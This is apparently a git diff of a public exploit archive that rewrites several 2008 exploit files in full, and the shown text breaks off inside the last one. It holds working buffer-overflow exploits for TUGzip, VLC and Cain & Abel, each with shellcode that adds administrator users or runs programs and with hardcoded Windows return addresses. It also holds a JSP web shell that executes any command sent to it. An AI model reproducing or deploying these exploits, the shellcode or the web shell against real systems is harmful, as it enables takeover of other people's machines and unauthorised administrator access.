+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x41\x49\x89\x04\x02\x12\x01\x61"
+"\x82\xFD\x81\x98\x98\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+"\x32\x32\x32\x32\x2E\x74\x78\x74\x50\x4B\x05\x06\x00\x00\x00\x00"
+"\x01\x00\x01\x00\x42\x08\x00\x00\x32\x08\x00\x00";
+
+
+ char shellcode_1[]=
+   // Skylined's alpha2 unicode decoder
+   //Un-encoded ADD USER shellcode
+                    "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABA"
+                    "BABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB"
+        // Encoded opcodes
+                    "ylzHOTM0KPkP2kQ5OL2kQlKUt8kQzOtK0On82k1OO0KQ8kpIDKoDTKKQXnnQ7P4Y4lU4upptm7i1WZLM"
+                    "kQWRJKJTMkpTLdzdt59UdKooktkQzKOv4KlLNkDKooMLyqZKBkMLRkzajKQyQLmTM45sNQUpotRkmplp"
+                    "tEupQhlLBkoPlLRkRPKlvMRkoxjhzKKYtKqpFPkPm0KPbkphMlaOlqhvqPPVriJXCS5pCKNpOxJO8Nk0"
+                    "C0c8eHKNqzznPW9oyW1SBMotnNaUQhaUkpNOpckpRNOuqdmPRUpsqUPrmP%skp%s"
+                    "mPnOQ1OTNdo0mVMVMPpnOurTMP0lBOqS31PlC7prpobU0pkpoQotPmoyPn1YT3ptT2aQPtpo1bBSkp%s"
+                    "MPNOOQa4oTkPA";
+  //ADD USER shellcode TNX to metasploit                  
+ char shellcode_2[]=
+                    "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
+                    "\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
+                    "\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
+                    "\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
+                    "\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
+                    "\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
+                    "\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
+                    "\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
+                    "\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
+                    "\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
+                    "\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
+                    "\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
+                    "\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
+                    "\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
+                    "\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
+                    "\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
+                    "\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
+                    "\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
+                    "\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
+                    "\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
+                    "\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
+                    "\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
+                    
+         struct addresses
+                     { char *platform;
+                       unsigned long addr; 
+                     } 
+                                                                                            targets[]=
+                     {                                                                       
+                                                 
+                                                 {  "[*]Microsoft Windows XP 5.1.1.0 SP1 (IA32)English(jmp esp)",0x778eadcf                  },
+                                                 {  "[*]Microsoft Windows Pro sp3 English (call esp)",0x7C8369F0                             },
+                                                 {  "[*]Microsoft Windows Pro sp3 English (jmp esp)",0x7C86467B                              },
+                                                 {  "[*]Windows XP 5.1.2.0 SP2 (IA32) English (jmp esp)",0x7d184de7                          },
+                                                 {  "[*]Windows XP 5.1.2.0 SP2 (IA32) German (jmp esp)",0x77d85197                           },
+                                                 {  "[*]Windows 2000 5.0.1.0 SP1 (IA32) English (jmp esp)",0x69952208                        },
+                                                 {  "[*]Crash the program",0x58585858                                                        },
+                                                 {NULL                                                                                       }
+                     };         
+                       
+ int main(int argc,char *argv[])
+  { FILE *h;
+    char *buffer;
+    buffer=(char *)malloc(sizeof(file_1)+sizeof(file_2));
+    unsigned int offset=0;
+    int number;  
+    unsigned int retaddress=targets[atoi(argv[2])].addr; 
+       if(argc<2) 
+                       {     printf("#   \tChose your Platform #\n"); 
+                             for(int i=0;targets[i].platform;i++)
+                             printf("%d \t\t %s\n",i,targets[i].platform);
+                             printf("\tUsage is:\n");
+                             printf(argv[0]);
+                             printf(".exe ");
+                             printf("filename.zip ");
+                             printf("platform\n");                  
+                             printf("\t*****Credits for exploit and finding the bug go to Stefan Marin******\n");  
+                       
+                             system("color 02");
+                             Sleep(2000);
+                          return 0;  
+                       }
+                       
+     if((h=fopen(argv[1],"wb"))==NULL)
+  {    printf("error\n"); 
+       exit(0);
+  }
+                 
+     memcpy(buffer,file_1,sizeof(file_1)); offset=sizeof(file_1);   
+     memcpy(buffer+offset-1,file_2,sizeof(file_2));    offset=OFFSET;
+     memcpy(buffer+offset,&retaddress,4); offset=0; offset=NOP;
+     memset(buffer+offset,0x90,20);
+      
+      printf("#___________________________________________________________________________#\n");
+      printf("Now chose your shellcode \n");
+      printf("Press [1] for Alphanumeric shellcode\n");
+      printf("Press [2] for NonAphanumeric shellcode\n");
+      printf("#___________________________________________________________________________#\n");
+       
+                   scanf("%d",&number);                   
+                                      switch(number)
+                         { case 1:
+                                 offset=shellcode_offset;
+                                 memcpy(buffer+offset,shellcode_1,sizeof(shellcode_1));                  
+                           case 2:
+                                 offset=shellcode_offset;
+                                 memcpy(buffer+offset,shellcode_2,sizeof(shellcode_2)); 
+                         }                        
+     fwrite(buffer,1,sizeof(file_1)+sizeof(file_2),h); 
+     printf("Building file ...\n");
+     printf("Done ! Open with TUGzip and see what happens :) \n");
+     printf("\t*****Credits for exploit and finding the bug go to Stefan Marin******\n"); 
+     fclose(h);
+     free(buffer);
+return 0;    
+       }
+
+// milw0rm.com [2008-10-24]
diff --git a/platforms/windows/local/7051.pl b/platforms/windows/local/7051.pl
index 4696233c3..5945af2a9 100755
--- a/platforms/windows/local/7051.pl
+++ b/platforms/windows/local/7051.pl
@@ -1,75 +1,75 @@
-#!/usr/bin/perl
-# VLC Media Player < 0.9.6 .RT File Buffer Overflow (Stack Based)
-# ---------------------------------------------------------------
-# Exploit by SkD 
-#
-# This should work on a fully up-to-date Windows XP SP3. If you want it to work
-# on your OS version, just find a "jmp esp" address in one of the dlls loaded
-# with VLC :).
-# Have fun.  Remember that VLC will open the file .rt automatically with a video
-# of the same name (example: s.mov with s.rt in the same folder).
-# Credits to Tobias Klein.
-# Author has no responsibility over the damage you do with this!
-
-use strict; use warnings;
-# win32_exec -  EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49".
-"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41".
-"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32".
-"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x69\x79\x4b\x4c\x4d".
-"\x38\x70\x44\x55\x50\x45\x50\x75\x50\x6e\x6b\x77\x35\x67\x4c\x6c".
-"\x4b\x43\x4c\x45\x55\x74\x38\x55\x51\x58\x6f\x4e\x6b\x52\x6f\x45".
-"\x48\x4e\x6b\x43\x6f\x65\x70\x76\x61\x58\x6b\x50\x49\x4e\x6b\x36".
-"\x54\x4e\x6b\x75\x51\x4a\x4e\x56\x51\x6b\x70\x4c\x59\x6c\x6c\x6e".
-"\x64\x59\x50\x70\x74\x63\x37\x69\x51\x78\x4a\x56\x6d\x45\x51\x5a".
-"\x62\x78\x6b\x6c\x34\x67\x4b\x51\x44\x36\x44\x74\x44\x30\x75\x4d".
-"\x35\x6c\x4b\x31\x4f\x31\x34\x65\x51\x5a\x4b\x52\x46\x4c\x4b\x74".
-"\x4c\x62\x6b\x6c\x4b\x61\x4f\x77\x6c\x35\x51\x7a\x4b\x6c\x4b\x57".
-"\x6c\x4c\x4b\x37\x71\x5a\x4b\x4c\x49\x73\x6c\x77\x54\x47\x74\x38".
-"\x43\x50\x31\x6b\x70\x32\x44\x4e\x6b\x61\x50\x66\x50\x4f\x75\x6b".
-"\x70\x51\x68\x44\x4c\x6c\x4b\x77\x30\x36\x6c\x6e\x6b\x70\x70\x77".
-"\x6c\x6c\x6d\x6c\x4b\x50\x68\x73\x38\x6a\x4b\x74\x49\x6c\x4b\x4b".
-"\x30\x4c\x70\x63\x30\x73\x30\x45\x50\x4e\x6b\x45\x38\x35\x6c\x53".
-"\x6f\x35\x61\x4c\x36\x75\x30\x71\x46\x6d\x59\x4a\x58\x4b\x33\x4f".
-"\x30\x31\x6b\x70\x50\x43\x58\x61\x6e\x6e\x38\x4b\x52\x32\x53\x31".
-"\x78\x4c\x58\x4b\x4e\x4c\x4a\x46\x6e\x50\x57\x6b\x4f\x5a\x47\x50".
-"\x63\x31\x71\x30\x6c\x35\x33\x44\x6e\x63\x55\x44\x38\x35\x35\x37".
-"\x70\x41";
-my $char = "\x41";
-my $nop = "\x90";
-my $eip = "\xd7\x30\x9d\x7c"; #   FOR WINDOWS XP SP3:  0x7c9d30d7       jmp esp (shell32.dll)
-my $jmp = "\xeb\x06\xFF\xFF";
-my $addr =  "\xb5\xb5\xfd\x7f";
-open(my $rt, "> s.rt");
-print $rt  "\x3C\x77\x69\x6E\x64\x6F\x77\x20\x68\x65".
-	     "\x69\x67\x68\x74\x3D\x22\x32\x35\x30\x22".
-             "\x20\x77\x69\x64\x74\x68\x3D\x22\x33\x30".
-             "\x30\x22\x20\x64\x75\x72\x61\x74\x69\x6F".
-             "\x6E\x3D\x22\x31\x35\x22\x20\x62\x67\x63".
-             "\x6F\x6C\x6F\x72\x3D\x22\x79\x65\x6C\x6C".
-             "\x6F\x77\x22\x3E\x0D\x0A\x4D\x61\x72\x79".
-             "\x20\x68\x61\x64\x20\x61\x20\x6C\x69\x74".
-             "\x74\x6C\x65\x20\x6C\x61\x6D\x62\x2C\x0D".
-             "\x0A\x3C\x62\x72\x2F\x3E\x3C\x74\x69\x6D".
-             "\x65\x20\x62\x65\x67\x69\x6E\x3D\x22".
-             $char x 72 . $eip . $jmp . $addr .  $nop x 12 .
-             $shellcode . $char x 1024 .
-             "\x22\x2F\x3E\x0D\x0A\x3C\x62\x72\x2F\x3E".
-             "\x3C\x74\x69\x6D\x65\x20\x62\x65\x67\x69".
-             "\x6E\x3D\x22\x36\x22\x2F\x3E\x6C\x69\x74".
-             "\x74\x6C\x65\x20\x6C\x61\x6D\x62\x2C\x0D".
-             "\x0A\x3C\x62\x72\x2F\x3E\x3C\x74\x69\x6D".
-             "\x65\x20\x62\x65\x67\x69\x6E\x3D\x22\x39".
-             "\x22\x2F\x3E\x4D\x61\x72\x79\x20\x68\x61".
-             "\x64\x20\x61\x20\x6C\x69\x74\x74\x6C\x65".
-             "\x20\x6C\x61\x6D\x62\x0D\x0A\x3C\x62\x72".
-             "\x2F\x3E\x3C\x74\x69\x6D\x65\x20\x62\x65".
-             "\x67\x69\x6E\x3D\x22\x31\x32\x22\x2F\x3E".
-             "\x77\x68\x6F\x73\x65\x20\x66\x6C\x65\x65".
-             "\x63\x65\x20\x77\x61\x73\x20\x77\x68\x69".
-             "\x74\x65\x20\x61\x73\x20\x73\x6E\x6F\x77".
-             "\x2E\x0D\x0A\x3C\x2F\x77\x69\x6E\x64\x6F".
-             "\x77\x3E\x0D\x0A";
-
-# milw0rm.com [2008-11-07]
+#!/usr/bin/perl
+# VLC Media Player < 0.9.6 .RT File Buffer Overflow (Stack Based)
+# ---------------------------------------------------------------
+# Exploit by SkD 
+#
+# This should work on a fully up-to-date Windows XP SP3. If you want it to work
+# on your OS version, just find a "jmp esp" address in one of the dlls loaded
+# with VLC :).
+# Have fun.  Remember that VLC will open the file .rt automatically with a video
+# of the same name (example: s.mov with s.rt in the same folder).
+# Credits to Tobias Klein.
+# Author has no responsibility over the damage you do with this!
+
+use strict; use warnings;
+# win32_exec -  EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49".
+"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41".
+"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32".
+"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x69\x79\x4b\x4c\x4d".
+"\x38\x70\x44\x55\x50\x45\x50\x75\x50\x6e\x6b\x77\x35\x67\x4c\x6c".
+"\x4b\x43\x4c\x45\x55\x74\x38\x55\x51\x58\x6f\x4e\x6b\x52\x6f\x45".
+"\x48\x4e\x6b\x43\x6f\x65\x70\x76\x61\x58\x6b\x50\x49\x4e\x6b\x36".
+"\x54\x4e\x6b\x75\x51\x4a\x4e\x56\x51\x6b\x70\x4c\x59\x6c\x6c\x6e".
+"\x64\x59\x50\x70\x74\x63\x37\x69\x51\x78\x4a\x56\x6d\x45\x51\x5a".
+"\x62\x78\x6b\x6c\x34\x67\x4b\x51\x44\x36\x44\x74\x44\x30\x75\x4d".
+"\x35\x6c\x4b\x31\x4f\x31\x34\x65\x51\x5a\x4b\x52\x46\x4c\x4b\x74".
+"\x4c\x62\x6b\x6c\x4b\x61\x4f\x77\x6c\x35\x51\x7a\x4b\x6c\x4b\x57".
+"\x6c\x4c\x4b\x37\x71\x5a\x4b\x4c\x49\x73\x6c\x77\x54\x47\x74\x38".
+"\x43\x50\x31\x6b\x70\x32\x44\x4e\x6b\x61\x50\x66\x50\x4f\x75\x6b".
+"\x70\x51\x68\x44\x4c\x6c\x4b\x77\x30\x36\x6c\x6e\x6b\x70\x70\x77".
+"\x6c\x6c\x6d\x6c\x4b\x50\x68\x73\x38\x6a\x4b\x74\x49\x6c\x4b\x4b".
+"\x30\x4c\x70\x63\x30\x73\x30\x45\x50\x4e\x6b\x45\x38\x35\x6c\x53".
+"\x6f\x35\x61\x4c\x36\x75\x30\x71\x46\x6d\x59\x4a\x58\x4b\x33\x4f".
+"\x30\x31\x6b\x70\x50\x43\x58\x61\x6e\x6e\x38\x4b\x52\x32\x53\x31".
+"\x78\x4c\x58\x4b\x4e\x4c\x4a\x46\x6e\x50\x57\x6b\x4f\x5a\x47\x50".
+"\x63\x31\x71\x30\x6c\x35\x33\x44\x6e\x63\x55\x44\x38\x35\x35\x37".
+"\x70\x41";
+my $char = "\x41";
+my $nop = "\x90";
+my $eip = "\xd7\x30\x9d\x7c"; #   FOR WINDOWS XP SP3:  0x7c9d30d7       jmp esp (shell32.dll)
+my $jmp = "\xeb\x06\xFF\xFF";
+my $addr =  "\xb5\xb5\xfd\x7f";
+open(my $rt, "> s.rt");
+print $rt  "\x3C\x77\x69\x6E\x64\x6F\x77\x20\x68\x65".
+	     "\x69\x67\x68\x74\x3D\x22\x32\x35\x30\x22".
+             "\x20\x77\x69\x64\x74\x68\x3D\x22\x33\x30".
+             "\x30\x22\x20\x64\x75\x72\x61\x74\x69\x6F".
+             "\x6E\x3D\x22\x31\x35\x22\x20\x62\x67\x63".
+             "\x6F\x6C\x6F\x72\x3D\x22\x79\x65\x6C\x6C".
+             "\x6F\x77\x22\x3E\x0D\x0A\x4D\x61\x72\x79".
+             "\x20\x68\x61\x64\x20\x61\x20\x6C\x69\x74".
+             "\x74\x6C\x65\x20\x6C\x61\x6D\x62\x2C\x0D".
+             "\x0A\x3C\x62\x72\x2F\x3E\x3C\x74\x69\x6D".
+             "\x65\x20\x62\x65\x67\x69\x6E\x3D\x22".
+             $char x 72 . $eip . $jmp . $addr .  $nop x 12 .
+             $shellcode . $char x 1024 .
+             "\x22\x2F\x3E\x0D\x0A\x3C\x62\x72\x2F\x3E".
+             "\x3C\x74\x69\x6D\x65\x20\x62\x65\x67\x69".
+             "\x6E\x3D\x22\x36\x22\x2F\x3E\x6C\x69\x74".
+             "\x74\x6C\x65\x20\x6C\x61\x6D\x62\x2C\x0D".
+             "\x0A\x3C\x62\x72\x2F\x3E\x3C\x74\x69\x6D".
+             "\x65\x20\x62\x65\x67\x69\x6E\x3D\x22\x39".
+             "\x22\x2F\x3E\x4D\x61\x72\x79\x20\x68\x61".
+             "\x64\x20\x61\x20\x6C\x69\x74\x74\x6C\x65".
+             "\x20\x6C\x61\x6D\x62\x0D\x0A\x3C\x62\x72".
+             "\x2F\x3E\x3C\x74\x69\x6D\x65\x20\x62\x65".
+             "\x67\x69\x6E\x3D\x22\x31\x32\x22\x2F\x3E".
+             "\x77\x68\x6F\x73\x65\x20\x66\x6C\x65\x65".
+             "\x63\x65\x20\x77\x61\x73\x20\x77\x68\x69".
+             "\x74\x65\x20\x61\x73\x20\x73\x6E\x6F\x77".
+             "\x2E\x0D\x0A\x3C\x2F\x77\x69\x6E\x64\x6F".
+             "\x77\x3E\x0D\x0A";
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/windows/local/7135.htm b/platforms/windows/local/7135.htm
index 029a5b1a6..26de0ba34 100755
--- a/platforms/windows/local/7135.htm
+++ b/platforms/windows/local/7135.htm
@@ -1,41 +1,41 @@
-
-uh?
-
-
-
-
-
-
-# milw0rm.com [2008-11-17]
+
+uh?
+
+
+
+
+
+
+# milw0rm.com [2008-11-17]
diff --git a/platforms/windows/local/7264.txt b/platforms/windows/local/7264.txt
index e636503a3..0e503a305 100755
--- a/platforms/windows/local/7264.txt
+++ b/platforms/windows/local/7264.txt
@@ -1,40 +1,40 @@
-<%@ page import="java.util.*,java.io.*"%>
-<%
-%>
- 
-<%--
-abysssec inc public material
- 
-just upload this file with abysssec.jsp and execute your command
-your command will run as administrator . you can download sam file
-add user or do anything you want .
-note : please be gentle and don't obstructionism .
-vulnerability discovered by : abysssec.com
- 
- --%>
-
- Abysssec inc (abysssec.com) JSP vulnerability </tile>
-<center><h3>JSP Privilege Escalation Vulnerability PoC</center></h3>
-<FORM METHOD="GET" NAME="myform" ACTION="">
-<INPUT TYPE="text" NAME="cmd">
-<INPUT TYPE="submit" VALUE="Execute !">
-</FORM>
-<pre>
-<%
-if (request.getParameter("cmd") != null) {
-        out.println("Command: " + request.getParameter("cmd") + "<BR>");
-        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
-        OutputStream os = p.getOutputStream();
-        InputStream in = p.getInputStream();
-        DataInputStream dis = new DataInputStream(in);
-        String disr = dis.readLine();
-        while ( disr != null ) {
-                out.println(disr); 
-                disr = dis.readLine(); 
-                }
-        }
-%>
-</pre>
-</BODY></HTML>
-
-# milw0rm.com [2008-11-28]
+<%@ page import="java.util.*,java.io.*"%>
+<%
+%>
+ 
+<%--
+abysssec inc public material
+ 
+just upload this file with abysssec.jsp and execute your command
+your command will run as administrator . you can download sam file
+add user or do anything you want .
+note : please be gentle and don't obstructionism .
+vulnerability discovered by : abysssec.com
+ 
+ --%>
+<HTML><BODY bgcolor=#0000000 and text=#DO0000>
+<title> Abysssec inc (abysssec.com) JSP vulnerability </tile>
+<center><h3>JSP Privilege Escalation Vulnerability PoC</center></h3>
+<FORM METHOD="GET" NAME="myform" ACTION="">
+<INPUT TYPE="text" NAME="cmd">
+<INPUT TYPE="submit" VALUE="Execute !">
+</FORM>
+<pre>
+<%
+if (request.getParameter("cmd") != null) {
+        out.println("Command: " + request.getParameter("cmd") + "<BR>");
+        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
+        OutputStream os = p.getOutputStream();
+        InputStream in = p.getInputStream();
+        DataInputStream dis = new DataInputStream(in);
+        String disr = dis.readLine();
+        while ( disr != null ) {
+                out.println(disr); 
+                disr = dis.readLine(); 
+                }
+        }
+%>
+</pre>
+</BODY></HTML>
+
+# milw0rm.com [2008-11-28]
diff --git a/platforms/windows/local/7329.py b/platforms/windows/local/7329.py
index a76c68b1f..0cab8d5e4 100755
--- a/platforms/windows/local/7329.py
+++ b/platforms/windows/local/7329.py
@@ -1,58 +1,58 @@
-#exploit.py
-print ""
-print "                 !R4Q!4N H4CK3R"
-print "Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit"
-print "By:Encrypt3d.M!nd"
-print "encrypt3d.blogspot.com"
-print "######################################################"
-print "Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder..and all my friends"
-print "This is exploit for my PoC"
-print "Tested on:Windows Xp Sp3 Patched"
-print "This exploit will Create File(.rdp) and when decoding"
-print "The file with Cain(Remote Desktop Password Decoder)"
-print "Will Add administrator user(user) with password(pass)"
-print ""
-
-# win32_adduser -  PASS=pass EXITFUNC=seh USER=user Size=232
-Encoder=PexFnstenvSub http://metasploit.com
-
-shellcode = "\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46"
-shellcode+= "\xcd\x10\x60\x83\xeb\xfc\xe2\xf4\xba\x25\x54\x60\x46\xcd\x9b\x25"
-shellcode+= "\x7a\x46\x6c\x65\x3e\xcc\xff\xeb\x09\xd5\x9b\x3f\x66\xcc\xfb\x29"
-shellcode+= "\xcd\xf9\x9b\x61\xa8\xfc\xd0\xf9\xea\x49\xd0\x14\x41\x0c\xda\x6d"
-shellcode+= "\x47\x0f\xfb\x94\x7d\x99\x34\x64\x33\x28\x9b\x3f\x62\xcc\xfb\x06"
-shellcode+= "\xcd\xc1\x5b\xeb\x19\xd1\x11\x8b\xcd\xd1\x9b\x61\xad\x44\x4c\x44"
-shellcode+= "\x42\x0e\x21\xa0\x22\x46\x50\x50\xc3\x0d\x68\x6c\xcd\x8d\x1c\xeb"
-shellcode+= "\x36\xd1\xbd\xeb\x2e\xc5\xfb\x69\xcd\x4d\xa0\x60\x46\xcd\x9b\x08"
-shellcode+= "\x7a\x92\x21\x96\x26\x9b\x99\x98\xc5\x0d\x6b\x30\x2e\x3d\x9a\x64"
-shellcode+= "\x19\xa5\x88\x9e\xcc\xc3\x47\x9f\xa1\xae\x7d\x04\x68\xa8\x68\x05"
-shellcode+= "\x66\xe2\x73\x40\x28\xa8\x64\x40\x33\xbe\x75\x12\x66\xb8\x63\x05"
-shellcode+= "\x34\xed\x60\x01\x35\xbe\x30\x4f\x07\x89\x54\x40\x60\xeb\x30\x0e"
-shellcode+= "\x23\xb9\x30\x0c\x29\xae\x71\x0c\x21\xbf\x7f\x15\x36\xed\x51\x04"
-shellcode+= "\x2b\xa4\x7e\x09\x35\xb9\x62\x01\x32\xa2\x62\x13\x66\xb8\x63\x05"
-shellcode+= "\x34\xed\x3f\x21\x02\x89\x10\x60";
-
-# and if you want to test it..this shellcode will open calc.exe
-#shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2"
-#shellcode+= "\xab\x63\x3d\x83\xeb\xfc\xe2\xf4\x4e\x43\x27\x3d\xb2\xab\xe8\x78"
-#shellcode+= "\x8e\x20\x1f\x38\xca\xaa\x8c\xb6\xfd\xb3\xe8\x62\x92\xaa\x88\x74"
-#shellcode+= "\x39\x9f\xe8\x3c\x5c\x9a\xa3\xa4\x1e\x2f\xa3\x49\xb5\x6a\xa9\x30"
-#shellcode+= "\xb3\x69\x88\xc9\x89\xff\x47\x39\xc7\x4e\xe8\x62\x96\xaa\x88\x5b"
-#shellcode+= "\x39\xa7\x28\xb6\xed\xb7\x62\xd6\x39\xb7\xe8\x3c\x59\x22\x3f\x19"
-#shellcode+= "\xb6\x68\x52\xfd\xd6\x20\x23\x0d\x37\x6b\x1b\x31\x39\xeb\x6f\xb6"
-#shellcode+= "\xc2\xb7\xce\xb6\xda\xa3\x88\x34\x39\x2b\xd3\x3d\xb2\xab\xe8\x55"
-#shellcode+= "\x8e\xf4\x52\xcb\xd2\xfd\xea\xc5\x31\x6b\x18\x6d\xda\x5b\xe9\x39"
-#shellcode+= "\xed\xc3\xfb\xc3\x38\xa5\x34\xc2\x55\xc8\x02\x51\xd1\x85\x06\x45"
-#shellcode+= "\xd7\xab\x63\x3d";
-
-eip = "\xB7\x2F\x49\x7E" #user32.dll jmp esp 0x7E492FB7
-
-chars = "E"*8206
-print "Bu!ld!ng 3xpl0!t....Pl3453 W4!t"
-print ""
-file = open('cain.rdp','w')
-file.write (chars+eip+eip+"\x90"*10+shellcode)
-file.close()
-print "D0NE!"
-
-# milw0rm.com [2008-12-03]
+#exploit.py
+print ""
+print "                 !R4Q!4N H4CK3R"
+print "Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit"
+print "By:Encrypt3d.M!nd"
+print "encrypt3d.blogspot.com"
+print "######################################################"
+print "Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder..and all my friends"
+print "This is exploit for my PoC"
+print "Tested on:Windows Xp Sp3 Patched"
+print "This exploit will Create File(.rdp) and when decoding"
+print "The file with Cain(Remote Desktop Password Decoder)"
+print "Will Add administrator user(user) with password(pass)"
+print ""
+
+# win32_adduser -  PASS=pass EXITFUNC=seh USER=user Size=232
+Encoder=PexFnstenvSub http://metasploit.com
+
+shellcode = "\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46"
+shellcode+= "\xcd\x10\x60\x83\xeb\xfc\xe2\xf4\xba\x25\x54\x60\x46\xcd\x9b\x25"
